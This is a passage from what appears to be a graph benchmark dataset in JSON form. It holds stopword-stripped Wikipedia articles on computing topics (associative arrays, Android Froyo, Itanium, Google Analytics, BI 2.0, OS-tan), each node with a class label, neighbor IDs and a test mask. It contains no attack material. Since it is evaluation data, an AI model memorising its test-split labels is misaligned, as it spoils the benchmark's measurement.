alist syntax codice_43 used indicate codice_44ed pair keys values need type within alist lisp scheme provide operators codice_45 manipulate alists ways similar associative arrays linear nature alists used relatively small sets data common lisp also supports hash table data type scheme implemented srfi 69 hash tables greater overhead alists provide much faster access many elements easy construct composite abstract data types lisp using structures and/or object-oriented programming features conjunction lists arrays hash tables lpc implements associative arrays fundamental type known either map mapping depending driver keys values type mapping literal written codice_46 procedural use looks like mappings accessed reading using indexing operator way writing shown phone_book sally smart would return string 555-9999 phone_book john smith would return 0 testing presence done using function member e.g codice_47 deletion accomplished using function called either m_delete map_delete depending driver used like codice_48 lpc drivers amylaar family implement multivalued mappings using secondary numeric index drivers mudos family support multivalued mappings example syntax lpc drivers modern enough support foreach construct allow iteration mapping types using lua table fundamental type used either array numerical index fast associative array keys values type except nil following focuses non-numerical indexes table literal written codice_49 example key valid identifier keyword quotes omitted case sensitive lookup written using either square brackets always works dot notation works identifier keys also loop keys associated values iterators loops entry removed setting nil likewise overwrite values add mathematica uses association expression represent associative arrays access keys strings key keyword necessary list keys values mumps every array associative array built-in language-level direct support associative arrays applies private process-specific arrays stored memory called locals well permanent shared arrays stored disk available concurrently multiple jobs name globals preceded circumflex distinguish local variable names access value element simply requires using name subscript also loop associated array follows cocoa api gnustep handle associative arrays using codice_50 mutable version codice_51 class cluster class allows assignments two objects made copy key object made inserted codice_50 therefore keys must conform codice_53 protocol inserted dictionary value object receives retain message increase reference count value object receive release message deleted dictionary explicitly adding dictionary different object key keys added creation lookup written using codice_54 notation using codice_55 action also loop keys values codice_56 key removed using codice_57 rexx associative arrays called stem variables compound variables stem variables numeric keys typically start 1 go 0 key stem variable used convention count items whole stem rexx easy way automatically accessing keys stem variable typically keys stored separate associative array numeric keys ruby hash used follows ruby supports hash looping iteration following syntax ruby also supports many useful operations hashes merging hashes selecting rejecting elements meet criteria inverting swapping keys values flattening hash array s-lang associative array type example also loop associated array number ways one print sorted-list better take advantage s-lang strong support standard arrays scala provides immutable map class part scala.collection framework scala type inference work codice_58 access array returns option type scala equivalent maybe monad haskell smalltalk dictionary used access entry message codice_59 sent dictionary object gives dictionary hashes/compares based equality holds strong references key value variants exist hash/compare identity identitydictionary keep weak references weakkeydictionary weakvaluedictionary every object implements hash object used key course also value snobol one first first programming languages use associative arrays associative arrays snobol called tables sml'97 standard standard ml programming language provide associative containers however various implementations standard ml provide associative containers library popular standard ml new jersey implementation provides signature somewhat like interface codice_60 defines common interface ordered functional immutable associative arrays several general functors codice_61 codice_62 codice_63 codice_64 allow create corresponding type ordered map types self-balancing binary search tree sorted association list red-black tree splay tree respectively using user-provided structure describe key type comparator functor returns structure follows codice_60 interface addition two pre-defined modules associative arrays integer keys codice_66 codice_67 sml/nj also provides polymorphic hash table monomorphic hash tables also supported using codice_68 functor another standard ml implementation moscow ml also provides associative containers first provides polymorphic hash tables codice_69 structure also functional maps sml/nj library available codice_70 codice_71 codice_72 structures two tcl facilities support associative array semantics array collection variables dict full implementation associative arrays dict look item iterate dict array literal space character variable name must grouped using either curly brackets substitution performed double quotes substitution performed alternatively several array elements set single command providing mappings list words containing whitespace braced access one array entry put standard output result retrieve entire array dictionary result order keys unspecified dictionary unordered array standard implementation common dialects visual basic use dictionary class microsoft scripting runtime shipped visual basic 6 visual basic .net relies collection classes provided .net framework unlike many command line interpreters powershell built-in language-level support defining associative arrays example like javascript property name valid identifier quotes omitted e.g entries separated either semicolon newline e.g keys values .net object type e.g also possible create empty associative array add single entries even associative arrays later new entries also added using array index operator property operator codice_73 method underlying .net object dereference assigned objects array index operator property operator parameterized property codice_74 .net object used loop associative array follows entry removed using codice_75 method underlying .net object hash tables added e.g many data serialization formats also support associative arrays see table json associative arrays also referred objects keys strings yaml associative arrays also called map elements key-value pairs yaml places restrictions type keys particular restricted scalar string values",
    "neighbors": [
      2304,
      6016,
      3076,
      4101,
      3462,
      8582,
      1931,
      2062,
      6414,
      6160,
      5521,
      10510,
      8854,
      3736,
      11674,
      1435,
      155,
      10145,
      11555,
      3876,
      5796,
      7076,
      5677,
      5806,
      9008,
      692,
      3765,
      8628,
      7479,
      10043,
      10684,
      6718,
      6335,
      963,
      8644,
      8262,
      5961,
      1610,
      1611,
      9804,
      3577,
      3790,
      847,
      8397,
      10569,
      11212,
      11219,
      5588,
      7894,
      4057,
      10586,
      11610,
      7646,
      10083,
      4069,
      8421,
      10470,
      7144,
      3562,
      7274,
      8554,
      8303,
      6640,
      8304,
      3573,
      1016,
      3705,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5522,
    "label": 2,
    "text": "Android_Froyo:android froyo android froyo sixth version android codename android mobile operating system developed google spanning versions 2.2 2.2.3 versions longer supported unveiled may 20 2010 google i/o 2010 conference one prominent changes froyo release usb tethering wi-fi hotspot functionality changes include support android cloud device messaging c2dm service enabling push notifications additional application speed improvements implemented jit compilation displayed within applications top-of-the-screen banners new features introduced froyo include following",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      11304,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      1892,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5523,
    "label": 3,
    "text": "Itanium:itanium itanium family 64-bit intel microprocessors implement intel itanium architecture formerly called ia-64 intel markets processors enterprise servers high-performance computing systems itanium architecture originated hewlett-packard hp later jointly developed hp intel itanium-based systems produced hp hp integrity servers line several manufacturers 2008 itanium fourth-most deployed microprocessor architecture enterprise-class systems behind x86-64 power isa sparc february 2017 intel released current generation test customers may began shipping volume last processor itanium family intel officially announced end life product discontinuance itanium cpu family january 30th 2019 1989 hp determined reduced instruction set computing risc architectures approaching processing limit one instruction per cycle hp researchers investigated new architecture later named explicitly parallel instruction computing epic allows processor execute multiple instructions clock cycle epic implements form long instruction word vliw architecture single instruction word contains multiple instructions epic compiler determines advance instructions executed time microprocessor simply executes instructions need elaborate mechanisms determine instructions execute parallel goal approach twofold enable deeper inspection code compile time identify additional opportunities parallel execution simplify processor design reduce energy consumption eliminating need runtime scheduling circuitry hp believed longer cost-effective individual enterprise systems companies develop proprietary microprocessors partnered intel 1994 develop ia-64 architecture derived epic intel willing undertake large development effort ia-64 expectation resulting microprocessor would used majority enterprise systems manufacturers hp intel initiated large joint development effort goal delivering first product merced 1998 development intel hp industry analysts predicted ia-64 would dominate servers workstations high-end desktops eventually supplant risc complex instruction set computing cisc architectures general-purpose applications compaq silicon graphics decided abandon development alpha mips architectures respectively favor migrating ia-64 several groups ported operating systems architecture including microsoft windows openvms linux hp-ux solaris tru64 unix monterey/64 latter three canceled reaching market 1997 apparent ia-64 architecture compiler much difficult implement originally thought delivery timeframe merced began slipping intel announced official name processor itanium october 4 1999 within hours name itanic coined usenet newsgroup reference rms titanic unsinkable ocean liner sank maiden voyage 1912 itanic since often used register others imply multibillion-dollar investment itanium—and early hype associated it—would followed relatively quick demise time itanium released june 2001 performance superior competing risc cisc processors itanium competed low-end primarily four-cpu smaller systems servers based x86 processors high-end ibm power sun microsystems sparc processors intel repositioned itanium focus high-end business hpc computing attempting duplicate x86 successful horizontal market i.e. single architecture multiple systems vendors success initial processor version limited replacing pa-risc hp systems alpha compaq systems mips sgi systems though ibm also delivered supercomputer based processor power sparc remained strong 32-bit x86 architecture continued grow enterprise space building economies scale fueled enormous installed base thousand systems using original merced itanium processor sold due relatively poor performance high cost limited software availability recognizing lack software could serious problem future intel made thousands early systems available independent software vendors isvs stimulate development hp intel brought next-generation itanium 2 processor market year later itanium 2 processor released 2002 marketed enterprise servers rather whole gamut high-end computing first itanium 2 code-named mckinley jointly developed hp intel relieved many performance problems original itanium processor mostly caused inefficient memory subsystem mckinley contains 221 million transistors 25 million logic measured 19.5 mm 21.6 mm 421 mm fabricated 180 nm bulk cmos process six layers aluminium metallization 2003 amd released opteron cpu implements 64-bit architecture called amd64 opteron gained rapid acceptance enterprise server space provided easy upgrade x86 influence microsoft intel responded implementing amd x86-64 instruction set architecture instead ia-64 xeon microprocessors 2004 resulting new industry-wide de facto standard intel released new itanium 2 family member codenamed madison 2003 madison used 130 nm process basis new itanium processors montecito released june 2006 march 2005 intel announced working new itanium processor codenamed tukwila released 2007 tukwila would four processor cores would replace itanium bus new common system interface would also used new xeon processor later year intel revised tukwila delivery date late 2008 november 2005 major itanium server manufacturers joined intel number software vendors form itanium solutions alliance promote architecture accelerate software porting alliance announced members would invest 10 billion itanium solutions end decade 2006 intel delivered montecito marketed itanium 2 9000 series dual-core processor roughly doubled performance decreased energy consumption 20 percent intel released itanium 2 9100 series codenamed montvale november 2007 may 2009 schedule tukwila follow-on revised release oems planned first quarter 2010 itanium 9300 series processor codenamed tukwila released february 8 2010 greater performance memory capacity device uses 65 nm process includes two four cores 24 mb on-die caches hyper-threading technology integrated memory controllers implements double-device data correction helps fix memory errors tukwila also implements intel quickpath interconnect qpi replace itanium bus-based architecture peak interprocessor bandwidth 96 gb/s peak memory bandwidth 34 gb/s quickpath processor integrated memory controllers interfaces memory directly using qpi interfaces directly connect processors i/o hubs quickpath also used intel processors using nehalem microarchitecture possibly enabled tukwila nehalem use chipsets tukwila incorporates four memory controllers supports multiple ddr3 dimms via separate memory controller much like nehalem-based xeon processor code-named beckton itanium 9500 series processor codenamed poulson follow-on processor tukwila released november 8 2012 according intel skips 45 nm process technology uses 32 nm process technology features eight cores 12-wide issue architecture multithreading enhancements new instructions take advantage parallelism especially virtualization poulson l3 cache size 32 mb l2 cache size 6 mb 512 kb 256 kb per core die size 544 mm² less predecessor tukwila 698.75 mm² isscc 2011 intel presented paper called 32nm 3.1 billion transistor 12-wide-issue itanium processor mission critical servers given intel history disclosing details itanium microprocessors isscc paper likely referred poulson analyst david kanter speculated poulson would use new microarchitecture advanced form multithreading uses two threads improve performance single threaded multithreaded workloads information also released hot chips conference information presented improvements multithreading resiliency improvements intel instruction replay ras new instructions thread priority integer instruction cache prefetching data access hints intel product change notification pcn 111456-01 lists four models itanium 9500 series cpu later removed revised document parts later listed intel material declaration data sheets mdds database intel later posted itanium 9500 reference manual models following 2012 hewlett-packard co. v. oracle corp. support lawsuit court documents unsealed santa clara county court judge revealed 2008 hewlett-packard paid intel around 440 million keep producing updating itanium microprocessors 2009 2014 2010 two companies signed another 250 million deal obliged intel continue making itanium cpus hp machines 2017 terms agreements hp pay chips gets intel intel launches tukwila poulson kittson kittson+ chips bid gradually boost performance platform rumors successor poulson code named kittson began circulate 2012–2013 first associated forthcoming 22 nm process shrink later revised face declining itanium sales less-ambitious 32 nm node april 2015 intel although yet confirmed formal specifications confirm continued work project meanwhile aggressively multicore xeon e7 platform displaced itanium-based solutions intel roadmap july 2016 hp spin-off hewlett packard enterprise hpe announced computer world kittson would released mid-2017 february 2017 intel reported shipping kittson test customers plans ship volume later year intel officially launched itanium 9700 series processor family may 11 2017 notably kittson microarchitecture improvements poulson higher clock speeds intel announced 9700 series last itanium chips produced models comparison xeon family server processors itanium never high-volume product intel intel release production numbers one industry analyst estimated production rate 200,000 processors per year 2007 according gartner inc. total number itanium servers processors sold vendors 2007 55,000 unclear whether clustered servers counted single server compares 417,000 risc servers spread across risc vendors 8.4 million x86 servers idc reports total 184,000 itanium-based systems sold 2001 2007 combined power/sparc/itanium systems market idc reports power captured 42 revenue sparc captured 32 itanium-based system revenue reached 26 second quarter 2008 according idc analyst 2007 hp accounted perhaps 80 itanium systems revenue according gartner 2008 hp accounted 95 itanium sales hp itanium system sales annual rate 4.4bn end 2008 declined 3.5bn end 2009 compared 35 decline unix system revenue sun 11 drop ibm x86-64 server revenue increase 14 period december 2012 idc released research report stating itanium server shipments would remain flat 2016 annual shipment 26,000 systems decline 50 compared shipments 2008 2006 hp manufactured least 80 itanium systems sold 7,200 first quarter 2006 bulk systems sold enterprise servers machines large-scale technical computing average selling price per system excess us 200,000 typical system uses eight itanium processors 2012 manufacturers offered itanium systems including hp bull nec inspur huawei addition intel offered chassis could used system integrators build itanium systems 2015 hp supplied itanium-based systems hp split late 2015 itanium systems branded integrity handled hewlett-packard enterprise hpe recent major update 2017 integrity i6 hp-ux 11i v3 update 16 hpe also supports operating systems including windows server 2008 r2 linux openvms nonstop itanium affected spectre meltdown itanium bus interfaces rest system via chipset enterprise server manufacturers differentiate systems designing developing chipsets interface processor memory interconnections peripheral controllers chipset heart system-level architecture system design development chipset costs tens millions dollars represents major commitment use itanium ibm created chipset 2003 intel 2002 neither developed chipsets support newer technologies ddr2 pci express tukwila moved away fsb chipsets supporting technologies manufactured itanium server vendors hp fujitsu sgi nec hitachi tukwila itanium processor model designed share common chipset intel xeon processor ex intel xeon processor designed four processor larger servers goal streamline system development reduce costs server oems many develop itanium- xeon-based servers however 2013 goal pushed back evaluated future implementation opportunities itanium supported i.e windows version longer bought following operating systems microsoft announced windows server 2008 r2 would last version windows server support itanium support started xp would also discontinue development itanium versions visual studio sql server likewise red hat enterprise linux 5 first released march 2007 last itanium edition red hat enterprise linux debian longer supports itanium officially last release official support debian 7 wheezy covered long term support lts unofficial support newer debian still available limited form via debian ports last available kernel wheezy-backports linux 3.14.0 released march 30 2014 possible manually update latest 3.14.x version recent kernel versions like 4.17.17 september 2018 addition canonical ltd. chose support itanium ubuntu 10.04 lts released april 2010 discontinued hp supporting certifying linux itanium 9300 tukwila servers late september 2012 nec announced return ia-64 previous noah line proprietary mainframe processors produced quad-core variant 40 nm called noah-6 hp sells virtualization technology itanium called integrity virtual machines allow software run itanium intel supported development compilers optimized platform especially suite compilers starting november 2010 introduction new product suites intel itanium compilers longer bundled intel x86 compilers single product intel offers itanium tools intel x86 tools including compilers independently different product bundles gcc open64 microsoft visual studio 2005 later also able produce machine code itanium according itanium solutions alliance 13,000 applications available itanium-based systems early 2008 though sun contested itanium application counts past isa also supported gelato itanium hpc user group developer community ported supported open-source software itanium emulation technique allows computer execute binary code compiled different type computer ibm acquisition quicktransit 2009 application binary software irix/mips solaris/sparc could run via type emulation called dynamic binary translation linux/itanium similarly hp implemented method execute pa-risc/hp-ux itanium/hp-ux via emulation simplify migration pa-risc customers radically different itanium instruction set itanium processors also run mainframe environment gcos groupe bull several x86 operating systems via instruction set simulators itanium aimed enterprise server high-performance computing hpc markets enterprise- hpc-focused processor lines include oracle fujitsu sparc processors ibm power microprocessors measured quantity sold itanium serious competition comes x86-64 processors including intel xeon line amd opteron line since 2009 servers shipped x86-64 processors 2005 itanium systems accounted 14 hpc systems revenue percentage declined industry shifted x86-64 clusters application october 2008 gartner report tukwila processor stated ... future roadmap itanium looks strong risc peer like power sparc itanium-based computer first appeared list top500 supercomputers november 2001 best position ever achieved itanium 2 based system list 2 achieved june 2004 thunder lawrence livermore national laboratory entered list rmax 19.94 teraflops november 2004 columbia entered list 2 51.8 teraflops least one itanium-based computer top 10 june 2007 peak number itanium-based machines list occurred november 2004 list 84 systems 16.8 june 2012 dropped one system 0.2 itanium system remained list november 2012 itanium processors show progression capability merced proof concept mckinley dramatically improved memory hierarchy allowed itanium become reasonably competitive madison shift 130 nm process allowed enough cache space overcome major performance bottlenecks montecito 90 nm process allowed dual-core implementation major improvement performance per watt montvale added three new features core-level lockstep demand-based switching front-side bus frequency 667 mhz first released 2001 itanium performance disappointing compared better-established risc cisc processors emulation run existing x86 applications operating systems particularly poor one benchmark 2001 reporting equivalent best 100 mhz pentium mode 1.1 ghz pentiums market time itanium failed make significant inroads ia-32 risc suffered following arrival x86-64 systems offered greater compatibility older x86 applications 2009 article history processor — itanium killed computer industry — journalist john c. dvorak reported continues one great fiascos last 50 years tech columnist ashlee vance commented delays underperformance turned product joke chip industry interview donald knuth said itanium approach ... supposed terrific—until turned wished-for compilers basically impossible write red hat microsoft announced plans drop itanium support operating systems due lack market interest however linux distributions gentoo debian remain available itanium march 22 2011 oracle corporation announced would longer develop new products hp-ux itanium although would continue provide support existing products following announcement hp sued oracle breach contract arguing oracle violated conditions imposed settlement oracle hiring former hp ceo mark hurd co-ceo requiring vendor support itanium software time hp discontinues sales itanium-based servers breach harmed business 2012 court ruled favor hp ordered oracle resume support itanium june 2016 hewlett-packard enterprise corporate successor hp server business awarded 3 billion damages lawsuit former intel official reported itanium business become profitable intel late 2009 2009 chip almost entirely deployed servers made hp 95 itanium server market share making main operating system itanium hp-ux march 22 2011 intel reaffirmed commitment itanium multiple generations chips development schedule although itanium attain limited success niche market high-end computing intel originally hoped would find broader acceptance replacement original x86 architecture amd chose different direction designing less radical x86-64 64-bit extension existing x86 architecture microsoft supported forcing intel introduce extensions x86-based processors designs run existing 32-bit applications native hardware speed offering support 64-bit memory addressing enhancements new applications architecture become predominant 64-bit architecture desktop portable market although itanium-based workstations initially introduced companies sgi longer available 1989 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2009 2010 2011 2012 2013 2014 2017 2019",
    "neighbors": [
      7173,
      9739,
      4108,
      8716,
      9741,
      5649,
      2066,
      7699,
      5655,
      10779,
      10781,
      6175,
      7713,
      7714,
      6181,
      8229,
      8231,
      8233,
      2604,
      3630,
      6192,
      6705,
      7218,
      10813,
      2623,
      10303,
      2113,
      7234,
      1606,
      3142,
      7755,
      4173,
      2638,
      4174,
      2135,
      4185,
      1119,
      2656,
      6243,
      10340,
      613,
      1638,
      3175,
      7270,
      4204,
      4717,
      8815,
      8820,
      630,
      4217,
      5754,
      5755,
      6268,
      3197,
      1149,
      8315,
      4228,
      8325,
      6797,
      142,
      4238,
      7311,
      7313,
      8851,
      6804,
      8855,
      5272,
      11417,
      4252,
      6815,
      5793,
      6818,
      8355,
      6821,
      1702,
      7852,
      9391,
      2224,
      2226,
      7858,
      3764,
      4276,
      9911,
      8890,
      2237,
      4286,
      5309,
      6339,
      6852,
      8900,
      6858,
      8394,
      9932,
      5329,
      3798,
      10966,
      9945,
      731,
      9436,
      221,
      11484,
      11487,
      10468,
      7911,
      4841,
      10985,
      1260,
      5356,
      2798,
      5358,
      1776,
      5871,
      8944,
      9455,
      9964,
      3317,
      2805,
      249,
      8442,
      3323,
      2811,
      5883,
      5380,
      7941,
      1798,
      5384,
      1801,
      5386,
      5898,
      5901,
      6926,
      6415,
      8976,
      3857,
      11539,
      3350,
      4886,
      1304,
      3352,
      11030,
      2339,
      10019,
      6950,
      295,
      2345,
      2350,
      3886,
      7983,
      10548,
      309,
      8501,
      823,
      825,
      5948,
      8514,
      10051,
      5444,
      4423,
      3403,
      4427,
      7505,
      6483,
      9044,
      344,
      7001,
      7002,
      8539,
      1376,
      4961,
      3938,
      8552,
      10601,
      10603,
      4465,
      371,
      5492,
      10612,
      1399,
      1400,
      7033,
      1402,
      894,
      5503,
      3457,
      3459,
      3973,
      9095,
      9611,
      3470,
      5518,
      6033,
      11153,
      5523,
      407,
      2455,
      409,
      3992,
      3995,
      9111,
      1952,
      10658,
      9126,
      426,
      4523,
      1964,
      10669,
      1967,
      2480,
      6063,
      9137,
      2995,
      9649,
      1461,
      10675,
      1463,
      7607,
      4030,
      7105,
      9665,
      453,
      7110,
      1480,
      1998,
      9166,
      5073,
      466,
      2516,
      5076,
      1499,
      2525,
      7134,
      5090,
      995,
      7653,
      1000,
      7657,
      4074,
      8684,
      10732,
      10734,
      6639,
      7151,
      6129,
      10225,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 5524,
    "label": 8,
    "text": "Google_Analytics:google analytics google analytics web analytics service offered google tracks reports website traffic currently platform inside google marketing platform brand google launched service november 2005 acquiring developer urchin google analytics widely used web analytics service web google analytics provides sdk allows gathering usage data ios android app known google analytics mobile apps google analytics used track website activity users session duration pages per session bounce rate etc along information source traffic integrated google ads users review online campaigns tracking landing page quality conversions goals goals might include sales lead generation viewing specific page downloading particular file google analytics approach show high-level dashboard-type data casual user in-depth data report set google analytics analysis identify poorly performing pages techniques funnel visualization visitors came referrers long stayed website geographical position also provides advanced features including custom visitor segmentation google analytics e-commerce reporting track sales activity performance e-commerce reports shows site transactions revenue many commerce-related metrics september 29 2011 google analytics launched real time analytics enabling user insight visitors currently site user 100 site profiles profile generally corresponds one website limited sites traffic fewer 5 million pageviews per month roughly 2 pageviews per second unless site linked google ads campaign google analytics includes google website optimizer rebranded google analytics content experiments google analytics cohort analysis helps understanding behaviour component groups users apart user population beneficial marketers analysts successful implementation marketing strategy google acquired urchin software corp. april 2005 google service developed urchin demand system also brings ideas adaptive path whose product measure map acquired used redesign google analytics 2006 google continued sell standalone installable urchin webanalytics software network value-added resellers discontinuation march 28 2012 google-branded version rolled november 2005 anyone wished sign however due extremely high demand service new sign-ups suspended week later capacity added system google began using lottery-type invitation-code model august 2006 google sending batches invitation codes server availability permitted since mid-august 2006 service fully available users – whether use google advertising newer version google analytics tracking code known asynchronous tracking code google claims significantly sensitive accurate able track even short activities website previous version delayed page loading performance reasons generally placed codice_1 body close html tag new code placed codice_2 html head tags triggered runs parallel page loading april 2011 google announced availability new version google analytics featuring multiple dashboards custom report options new interface design version later updated features real-time analytics goal flow charts october 2012 another new version google analytics announced called 'universal analytics key differences previous versions cross-platform tracking flexible tracking code collect data device introduction custom dimensions custom metrics march 2016 google released google analytics 360 software suite provides analytics return investment marketing indicators google analytics 360 includes five main products analytics tag manager optimize data studio surveys attribution audience center october 2017 new version google analytics announced called global site tag stated purpose unify tagging system simplify implementation june 2018 google introduced google marketing platform online advertisement analytics brand consists two former brands google doubleclick digital marketing google analytics 360 google analytics implemented page tags case called google analytics tracking code snippet javascript code website owner adds every page website tracking code runs client browser client browses page javascript enabled browser collects visitor data sends google data collection server part request web beacon tracking code loads larger javascript file google web server sets variables user account number larger file currently known ga.js typically 18 kb date file size unknown however recent size 40kbytes may 2018 c dir ga.js /s command pc shows following file sizes 2009 2018 2009/10/07 23,536 ga.js 2014/05/27 40,155 ga.js 2014/10/10 40,924 ga.js 2015/09/13 41,100 ga.js 2017/08/06 43,082 ga.js 2018/04/08 46,275 ga.js file usually loaded however due browser caching assuming caching enabled browser downloads ga.js start visit furthermore websites implement google analytics ga.js code use master file google browser previously visited website running google analytics already file cached machine addition transmitting information google server tracking code sets first party cookie cookies enabled browser visitor computer cookie stores anonymous information called clientid launch universal analytics several cookies storing information whether visitor site new returning visitor timestamp current visit referrer site campaign directed visitor page e.g. search engine keywords banner email visitor arrived site clicking link tagged utm parameters urchin traffic monitor tag values passed database addition google analytics mobile package allows google analytics applied mobile websites mobile package contains server-side tracking codes use php javaserver pages asp.net perl server-side language however many ad filtering programs extensions firefox adblock noscript mobile phone app disconnect mobile block google analytics tracking code prevents traffic users tracked leads holes collected data also privacy networks like tor mask user actual location present inaccurate geographical data small fraction users javascript-enabled/capable browsers turn feature limitations mainly ad filtering program allow significant amount visitor avoid tracker sometimes majority one potential impact data accuracy comes users deleting blocking google analytics cookies without cookies set google analytics collect data individual web user block delete cookies resulting data loss visits google analytics users website owners encourage users disable cookies example making visitors comfortable using site posting privacy policy limitations affect majority web analytics tools use page tags usually javascript programs embedded web pages collect visitor data store cookies visitor computer transmit remote database pretending load tiny graphic beacon another limitation google analytics large websites use sampling generation many reports reduce load servers provide users relatively quick response query google analytics limits reports 500,000 randomly sampled sessions profile level calculations margins error indicated visits metric margins error provided metrics google analytics reports small segments data margin error large several online discussions impact google analytics site performance however google introduced asynchronous javascript code december 2009 reduce risk slowing loading pages tagged ga.js script due ubiquity google analytics raises privacy concerns whenever someone visits website uses google analytics google tracks visit via users ip address order determine user approximate geographic location meet german legal requirements google analytics anonymize ip address google also released browser plugin turns data page visit sent google however browser extension available mobile browsers since plug-in produced distributed google met much discussion criticism furthermore realisation google scripts tracking user behaviours spawned production multiple often open-source browser plug-ins reject tracking cookies plug-ins allow users block google analytics similar sites tracking activities however partially new european privacy laws modern browsers allow users reject tracking cookies though flash cookies separate problem anecdotally reported errors occur behind proxy servers multiple firewalls changing timestamps registering invalid searches webmasters seek mitigate google analytics specific privacy issues employ number alternatives backends hosted machines discontinuation example product urchin webanalytics software google january 20 2015 associated press reported healthcare.gov providing access enrollees personal data private companies specialized advertising mentioning google analytics specifically google offers free google analytics iq lessons google analytics certification test free help center faq google groups forum official google analytics product support new product features announced google analytics blog enterprise support provided google analytics certified partners google academy ads google analytics api used third parties build custom applications reporting tools many applications exist one built run ios apple devices featured apple app store third party products also provide google analytics-based tracking management api core reporting api mcf reporting api real time reporting api subject limits quotas google analytics widely used website statistics service may 2008 pingdom released survey stating 161 500 32 biggest sites globally according alexa rank using google analytics later piece market share analysis claimed google analytics used around 49.95 top 1,000,000 websites ranked 2010 alexa 2012 use around 55 10,000 popular websites august 2013 google analytics used 66.2 10,000 popular websites ordered popularity reported builtwith",
    "neighbors": [
      4096,
      8719,
      3600,
      7700,
      10262,
      9244,
      10284,
      3633,
      3634,
      3643,
      5182,
      10814,
      1096,
      6729,
      4683,
      11343,
      3664,
      8285,
      2658,
      3688,
      10355,
      8821,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      9901,
      1203,
      7359,
      196,
      3269,
      3782,
      10445,
      10450,
      3795,
      1240,
      8413,
      9949,
      735,
      6367,
      236,
      9970,
      7926,
      3836,
      5887,
      5892,
      8455,
      10009,
      4378,
      7965,
      798,
      10525,
      288,
      4901,
      4911,
      5431,
      2875,
      10045,
      3905,
      11590,
      11592,
      9039,
      3409,
      1379,
      9063,
      5483,
      10604,
      7548,
      1409,
      4995,
      3462,
      8582,
      9610,
      5522,
      1427,
      10645,
      1943,
      1435,
      5536,
      2978,
      1959,
      3499,
      7595,
      6576,
      8644,
      4044,
      4048,
      10713,
      485,
      6632,
      1516,
      5100,
      9712
    ],
    "mask": "Test"
  },
  {
    "node_id": 5525,
    "label": 7,
    "text": "Business_Intelligence_2.0:business intelligence 2.0 business intelligence 2.0 bi 2.0 future development existing business intelligence model began mid-2000s data obtained many sources process allows querying real-time corporate data employees approaches data web browser based solution contrast previous proprietary querying tools characterizes previous bi software growth service-oriented architectures soa one main factors happening bi 2.0 intended flexible adaptive normal business intelligence data exchange processes also differ xbrl extensible business reporting language web services various semantic web ontologies enable using data external organization benchmarking type information business intelligence 2.0 believed named web 2.0 although takes elements web 2.0 focus user empowerment community collaboration technologies like rss concept mashups semantic web sometimes called web 3.0 semantic integration shared ontologies enable easier exchange data according analytics expert neil raden bi 2.0 also implies move away standard data warehouse business intelligence tools used give way context contingency need relate information quickly many sources",
    "neighbors": [
      772,
      4107,
      10452,
      247,
      10938
    ],
    "mask": "None"
  },
  {
    "node_id": 5526,
    "label": 2,
    "text": "OS-tan:os-tan os- tan internet meme originated within japanese futaba channel os- tan moe anthropomorphism/personification several operating systems various amateur japanese artists os- tan typically depicted women os- tan representative microsoft windows operating systems usually depicted sisters varying ages -tan element term hypocoristic suffix japanese though initially appearing fan work os- tan proved popular enough microsoft branches singapore taiwan used os- tan concept basis ad campaigns internet explorer microsoft silverlight respectively concept os- tan reported begun personification common perception windows released 2000 microsoft 9x counterpart windows 2000 unstable prone frequent crashes discussions futaba channel likened stereotype fickle troublesome girl personification expanded me- tan created followed characters one early works predominantly feature os- tan interactive flash animation showing possible intro imaginary anime show known trouble windows fansub eventually created partly responsible spread os- tan english language imageboards os- tan original concept pre-dated toy imac girl featured series desktops released august 1998 march 1999 ohzora publishing produced one book based os- tan characters titled includes illustrations 25 contributors also includes 95- tan me- tan xp- tan figures titled os girl 95 os girl os girl xp respectively include molded space 2k- tan named os girl 2k me- tan 2k- tan xp- tan designed guhico stranger workshop 95- tan designed fujisaki shiro h.b.company parthenon production limited company commercialized pink company os- tan products malino deja vu artworks produced document shared folder trilogy sold digital format japanese version windows 7 ultimate dsp edition includes unofficial nanami madobe mascot inspired microsoft taiwan launch official mascot microsoft silverlight hikaru followed giving hikaru sisters lei aoi yu special package japanese windows 7 ultimate dsp edition called touch mouse artist edition touch mouse limited edition artist series came animated tutorial windows theme custom sounds three desktop backgrounds featuring madobe nanami 2009 ubuntu-based comic titled ubunchu serialized kantan ubuntu spinoff weekly ascii magazine authored hiroshi seo english version translated fumihito yoshida hajime mizuno martin owens arturo silva anton ekblad japanese suffix mispronunciation informal intimate diminutive honorific suffix person used friends family pets case mispronunciation used intentionally achieve contrived cute charming effect commonly associated use young children also sometimes added names non-mascot characters personifications whole commonly simply called mascots mascot characters -tan suffix means nothing outside role honorific implications cuteness normal suffixes including -san -chan -kun also used name os- tan depending character speaker preference suffix may omitted entirely name windows 10 mascot officially introduced tōko touko madobe 31 july 2015 confirmed character official facebook page name homonym one readings japanese word 'ten name chosen fans online poll according fictional profile origins madobe family set 100 years future likes online gaming supporting others personal traits excellent student expanding knowledge technology manager often worries since ’ bit spontaneous also enjoys cheering people working hard best part-time job akibano custom computer company rookie level back story rather unusual os- tan japanese windows 8.1 pro dsp edition madobe family version windows navi+ techno-alliance corp. limited 1000 units version windows 8.1 pro 32/64-bit edition three types madobe family picture password wallpapers madobe character voices nanami yū ai claudia madobe family complete edition windows theme pack previously unpublished madobe family designs final pasocom data hikkoshi 9+ licence key skype three-month free trial historical windows logo stickers 